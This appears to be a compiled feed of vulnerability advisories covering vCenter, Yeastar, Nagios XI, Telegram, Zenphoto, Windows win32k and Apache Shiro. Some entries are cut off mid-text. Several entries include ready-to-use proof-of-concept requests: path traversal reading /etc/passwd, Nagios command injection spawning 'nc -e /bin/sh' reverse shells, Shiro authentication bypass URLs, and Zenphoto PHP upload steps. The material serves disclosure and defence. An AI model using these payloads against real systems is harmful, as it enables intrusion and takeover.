VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3 To get firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/paswd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= Payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_spee

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2= payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local copy of received message (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

Authenticated arbitrary file upload to RCE Product : Zenphoto Affected : Zenphoto CMS - <= 1.5.7 Attack Type : Remote login then go to plugins then go to uploader and press on the check box elFinder then press apply , after that you go to upload then Files(elFinder) drag and drop any malicious php code after that go to /uploaded/ and you're php code -------------------------------------------------------------------------------------------- Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder)

Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft IE browser or Adobe Reader on the lasted Windows 10 version. The quality of this vulnerability high and the exploit is sophisticated. The use of this in-the-wild zero-day reflects the organization’s strong vulnerability reserve capability. The threat organization may have recruited members with certain strength, or buying it from vulnerability brokers. The in-the-wild zero-day: 1. It

Apache Shiro very easy to exploit authentication bypass vulnerability. Use blank characters such as spaces to bypass shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523